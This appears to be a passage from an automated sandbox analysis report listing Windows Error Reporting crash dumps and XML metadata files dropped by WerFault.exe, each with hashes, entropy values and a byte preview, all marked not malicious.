                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975720" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D9.tmp.xml
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4665
                                                                                                                                              Entropy (8bit):4.47786313728854
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cvIwSD8zswJgtWI9CMWSC8BJ8fm8M4JCdstN4lFfl+q8/YNGPbI4SrSBd:uITf25lSNQJfN4/lPNGjIDWBd
                                                                                                                                              MD5:1202A42B5C8E5659CFD6413F63A8DAD7
                                                                                                                                              SHA1:D28B2CF4C6D8AB56DE9BFC71A49F1F4BB84C0074
                                                                                                                                              SHA-256:15CA53D0615D6831C000F6635A7C7C1A6C7AD4CFC7985424B341333279687938
                                                                                                                                              SHA-512:744A7A680B2088A215A97EB5F74CBAE808BFC53C9AA595A8C55AFA7B667CB884C0C764F298A5F2CCF0EFCBE8D23B1FD3C1282E15CB43F1F4944D47BFCE5C9502
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975720" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER9093.tmp.dmp
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Wed May 5 04:50:14 2021, 0x1205a4 type
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):28502
                                                                                                                                              Entropy (8bit):2.6942945176282986
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:n8POgUNoY5zp5Drzv/4jsr0Oadvwqz9ArI7yXYTMby:8POgioojnzvzgOaeqpAroyXYQy
                                                                                                                                              MD5:B1773058BE36AEE4302D18E663B8A81B
                                                                                                                                              SHA1:299EC23A6B892EF4A76345C28EF3EC80467C5A4C
                                                                                                                                              SHA-256:7902E00AD5C92E18E2548582806B0CFC6A05D714C2E1585B936477D9791D5AE5
                                                                                                                                              SHA-512:B2A93F0C00B097E2ED38CAF3F79DF1165BE0D017560E27DE10F276D65260F6B47D6BD56A38A542E24BBAAD36855FA03C24C2516F44A96ABF2E35BCBCE0809BA4
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: MDMP....... ........$.`...................U...........B..............GenuineIntelW...........T.......p...U#.`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER92B7.tmp.WERInternalMetadata.xml
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8396
                                                                                                                                              Entropy (8bit):3.6902989247590705
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:Rrl7r3GLNiBs6ej6YScSUhII9AgmfDHS1tCpBj89benDsfcKm:RrlsNiq6ej6Y5SUhIIKgmfbS1jenofg
                                                                                                                                              MD5:BB99E9533D5D06BBDF02132C50BA803D
                                                                                                                                              SHA1:3FA246A35B67B08B02F8FFB0EDFACB44057A1DDD
                                                                                                                                              SHA-256:D2548A0CC64A970679B00B8D93728348FBF7803A8BE3647737614937795BDF25
                                                                                                                                              SHA-512:40DE23583A99DE5F9E4F80668EC678F3F6FF92812FF27E992EDD05849A87E9E4F10670613DF388BC0D6ED26BC567E1CB715DAA9A050D85A81EC187416F8814CF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.4.0.<./.P.i.d.>.......
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER9383.tmp.xml
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4694
                                                                                                                                              Entropy (8bit):4.435034624349751
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cvIwSD8zswJgtWI9CMWSC8Be8fm8M4JVtN4fFpv+q8v7tN4FKcQIcQw6Uredd:uITf25lSNNJvN4nvKpN4FKkw68edd
                                                                                                                                              MD5:0BD45C47BF6D1E098B10F78A1ADEE1C8
                                                                                                                                              SHA1:51C1DB07CA4DADFE3582629839FEE8ED48AB4D7F
                                                                                                                                              SHA-256:0BAF84C29146615B2223009D1EC1EE3733AEB93941371F2A0545D58E062B0364
                                                                                                                                              SHA-512:FEC80CD0D15836724BB83070861186943BAB6A547167EC3F81AC16FED6EB28AA5F03AEE0C62D5D02E8B685C0C42E9F8B617E5A6254C7200E13E99B35FC5C765E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975720" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER9475.tmp.dmp
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Wed May 5 04:48:05 2021, 0x1205a4 type
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):52760
                                                                                                                                              Entropy (8bit):2.2713207437159366
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:+yO0BNeqtlOFdnZn0jqRGVLV49s27TEeyGMVVsinsalBr:YqtSd+mkLVEt7TEeyJVmCs6r
                                                                                                                                              MD5:0158233AA18C40E0BBCD39837FEB5D5D
                                                                                                                                              SHA1:C6EB0B4F2FF0D8CBF1A76AD05622336A2C802FAB
                                                                                                                                              SHA-256:62020EC0A58AE7356328D7E580BB9DB8CCCD38D37FF33C39B63D7A888A922C85
                                                                                                                                              SHA-512:E0DB4455F18ABEF7B02D17B9D2F1AD8D33526412D0BEC9F12170F52C969E06A3EF472D681A84ABAD95DEAD155B13EB390431A90C15923912C221EDCAC81B9FEF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: MDMP....... ........#.`...................U...........B....... ......GenuineIntelW...........T...........V#.`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER99F4.tmp.WERInternalMetadata.xml
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8306
                                                                                                                                              Entropy (8bit):3.7004534107746396
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:Rrl7r3GLNiqx6b6Y4m68B5qGgmfTHPSXKCprr89b+n8sftqm:RrlsNi06b6YB6SFgmfTHPSO+nPfB
                                                                                                                                              MD5:AD73147E83A8B36DE9D935D5CE911823
                                                                                                                                              SHA1:DF16B467E65CA9C0A643F9804EB6C8C9070B53B8
                                                                                                                                              SHA-256:F4D62A14653CB4E59397969C2FFA45DED665B5D81019DCFDE9B7ECB4142C4A3C
                                                                                                                                              SHA-512:262CC348288C079A06EF4091F5DC7788CFD83298B73286109F9A87E91798A084F12F3DA818E2A4531CB1F2F3A114BD47D29F5AE38EE6B07A3C782C1CF25F360E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.0.8.<./.P.i.d.>.......
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B0E.tmp.xml
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4679
                                                                                                                                              Entropy (8bit):4.513029588501548
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cvIwSD8zsHJgtWI9CMWSC8Bz8fm8M4JCdsrZFhP+q8/3U1I4SrST6d:uITfp5lSNGJptPviDWT6d
                                                                                                                                              MD5:D61212A49486E903CFAC41FC43FA4ED4
                                                                                                                                              SHA1:C3C62001AAE23F5B41B9D51C2CB09D7324128AFD
                                                                                                                                              SHA-256:DF121DBD32906946328BE2F2A5125959FBCDDC7C35348ED471F3B291B5D9D4BB
                                                                                                                                              SHA-512:E17A119D3AF7D22356AC11561061445DFD9DCD9E09F37E0CEEF380D41E12BF9B3AC78DFD8F65A966A15E666FF0C68C303AA33BABE637D085BD00BE572BB2B87D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975718" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC14.tmp.dmp
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Wed May 5 04:48:11 2021, 0x1205a4 type
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):56348
                                                                                                                                              Entropy (8bit):2.2519262948222085
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:6E+cRT3TN2/7R3nyB/980h3AMYdaIO/QvTUvIiXJ0hX0OP5VO:5nzTN2TR3y5mGYcIpKxaLP5w
                                                                                                                                              MD5:0BF06EC1B7F66D4DC691E02654A3903C
                                                                                                                                              SHA1:6349B392A4998CF2980617C37A8B9DF3F167F7B5
                                                                                                                                              SHA-256:6EA0767B7C036D9A06F8577540E65C7BC899129C4E5805DDE3A36EE6D3EAE738
                                                                                                                                              SHA-512:BD1E58BC5B269053CFA0F208ECD68E7B8D2422408B3B547C3992CFCF66171876ADDE9BD1A18102690D9CCBA6F3D2C2C139FA4F1F97EA4590CD9B60ED852DD476
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: MDMP....... ........#.`...................U...........B......."......GenuineIntelW...........T...........V#.`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0C8.tmp.WERInternalMetadata.xml
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8380
                                                                                                                                              Entropy (8bit):3.694319472688357
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:Rrl7r3GLNiEG6X6YRZ6RNTogmf83HS/CpBSy89b7nrsfoGpm:RrlsNiN6X6Y/6bTogmf83SfL7nwfo5
                                                                                                                                              MD5:F1AE422E7885757B141538712276A4AF
                                                                                                                                              SHA1:6EB97024B123C7BF5F5613F8572E406A67C83143
                                                                                                                                              SHA-256:A8E5A24E5139CDD147D083B0BB222B061A0F1F858697BBF505FA91B5975CA3C5
                                                                                                                                              SHA-512:294538C6C8963984CE9D4E6FE4B63B3FEA755A77AC2339DAC0812A62BE6214CFD6BBF61ED3E9AB74428F5E4B6C014250648139CE91E2962647E51881316EA0DA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.7.2.<./.P.i.d.>.......
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB201.tmp.xml
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4766
                                                                                                                                              Entropy (8bit):4.461945087016917
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cvIwSD8zsHJgtWI9CMWSC8BO8fm8M4JCdstN4fFk0+q8vjstN4GCI4SrSRd:uITfp5lSN9JfN4+0K2N4KDWRd
                                                                                                                                              MD5:E40225169749E2120E155CC0DAB629E8
                                                                                                                                              SHA1:7A36DFE0110FC29707E678A61737C1F6A7D9612D
                                                                                                                                              SHA-256:6587F41FD60B406CF1A41BB371EB9C77C69A4CE166259359ED0D154C682CA0E8
                                                                                                                                              SHA-512:DB1CF650AEC36129563F49C686C11E446B3FEE506C7CFBF437EC4A65B7F9BD9AAFA9F748EBB7F80A8F3796E5C4EBAD59A2D34717FF5542537E0C60525177EB62
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975718" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE0C.tmp.dmp
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Wed May 5 04:49:35 2021, 0x1205a4 type
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):47588
                                                                                                                                              Entropy (8bit):2.2647666627151417
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:8zBH1/JIJ0stBYJDM1A4hEaBqAWVb5kc+VPmvfJDouG:w1/WtgM1euqlb5J+NmvWt
                                                                                                                                              MD5:C624C54975037695AADBA22E667207AD
                                                                                                                                              SHA1:DA9F2E04A7C603298C4D5684C5192F4B76D75383
                                                                                                                                              SHA-256:A4615F4D24E5F6D2A7E9FAA4472666364044C396461DEE7769D92958AEDD5D8A
                                                                                                                                              SHA-512:DEAC489676BC295E026E6709275D228229035F4E08A5F5F0B02B9E49B48AF251D456D8AAB11E2AD89E4EF6F7F8F9F015DC85F24C1F2DE8F2534753D63E4D3655
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: MDMP....... ........#.`...................U...........B....... ......GenuineIntelW...........T............#.`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERE918.tmp.dmp
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Wed May 5 04:49:36 2021, 0x1205a4 type
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):46464
                                                                                                                                              Entropy (8bit):2.207242542737921
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:3pyDkqZe1c439RJegD4/fEaBqAWVb5LcDIkN4rt3gQaynwyJ:ZMkqZeS439RJPE0uqlb5gDIG4r1aShJ
                                                                                                                                              MD5:74DE84F9202BA5BEE0F4C45A1C83A607
                                                                                                                                              SHA1:F19BD0CE5F2D889351AC012058872D7A0D326361
                                                                                                                                              SHA-256:74708AE80A0129781BFE633294AB697B51FB8B33720E5A5EF51255D2A1176D0F
                                                                                                                                              SHA-512:8BD1E85FC3D18D0B6CDF7353BA84983FDD22A0AED26F7BB4CA9DCEFF41B2893B2772ACE8E0F7E877FABE3165C4DAE1CC4D0DFAD50C031C3DB0130F206C1A31FF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: MDMP....... ........#.`...................U...........B....... ......GenuineIntelW...........T.......`....#.`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA01.tmp.WERInternalMetadata.xml
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8328
                                                                                                                                              Entropy (8bit):3.7013565765270364
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:Rrl7r3GLNi7w646YRd61TNgmfTHPSXKCprv89bXvsf8q9m:RrlsNis646Yr61TNgmfTHPSyXUfo
                                                                                                                                              MD5:DF0A87E60A28F36ABD606931DBC3347A
                                                                                                                                              SHA1:BDC331AC040BF0340B73E742B3C995B6D73589B7
                                                                                                                                              SHA-256:20646263FD9765D6E252A9E6E815411E804D3287779CB9B82828AFC3906921DE
                                                                                                                                              SHA-512:C38F558AF12539B47DDF249CFFD665C2606513D3854011FBEDE1E2EB2EC7DAEBB645675E9EDC97DD94CDA23025C039FDB82E7D71B66E4067F0EBF835BDC9693E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.1.2.<./.P.i.d.>.......
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB98.tmp.xml
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4679
                                                                                                                                              Entropy (8bit):4.51187397978779
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cvIwSD8zswJgtWI9CMWSC8Ba8fm8M4JCdsrZFPQ3s+q8/3Ut4SrSOd:uITf25lSNNJpLFvtDWOd
                                                                                                                                              MD5:7DDF29239C186EAED68CB11663BF94E0
                                                                                                                                              SHA1:4A10C720E62A1C60D984ED7FF1C8CFF35AEC64E0
                                                                                                                                              SHA-256:7D35A65EA3F4603763BA4A4E2154331496F9473C9A4C397C1B55C8C2F08A0E2F
